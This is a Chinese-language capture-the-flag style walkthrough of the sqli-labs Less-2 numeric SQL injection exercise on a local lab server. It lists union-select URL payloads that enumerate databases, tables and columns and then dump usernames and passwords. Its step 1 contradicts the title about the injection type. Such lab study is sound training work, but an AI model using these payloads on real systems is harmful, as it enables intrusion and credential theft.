sqli-labs闖關筆記-less2-數字型注入
開啟Less-2中index.php檔案,在第32行$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";後面新增如下兩行:
echo $sql; 列印輸出的sql語句
echo "<br/>";列印換行符
1、檢視是否有注入,經報錯顯示是字元型注入,後面進行注入時不需要加單引號。
2、檢視有多少列,使用二分法,直到查到準確的列,現在表裡有3列。
http://127.0.0.1/sqli-labs/Less-2/?id=1 order by 3 --
3、檢視哪些資料可以回顯
http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,2,3 --
4、檢視資料庫security
http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,2,schema_name from information_schema.schemata --
顯示所有資料庫名
http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,2,group_concat(schema_name) from information_schema.schemata --
5、檢視資料庫
http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,2,database() --
6、檢視資料庫security的所有表
http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479--
7、檢視所有列資訊
http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273--
8、得到帳號密碼
http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,2,group_concat(concat_ws(0x7e,username,password)) from security.users--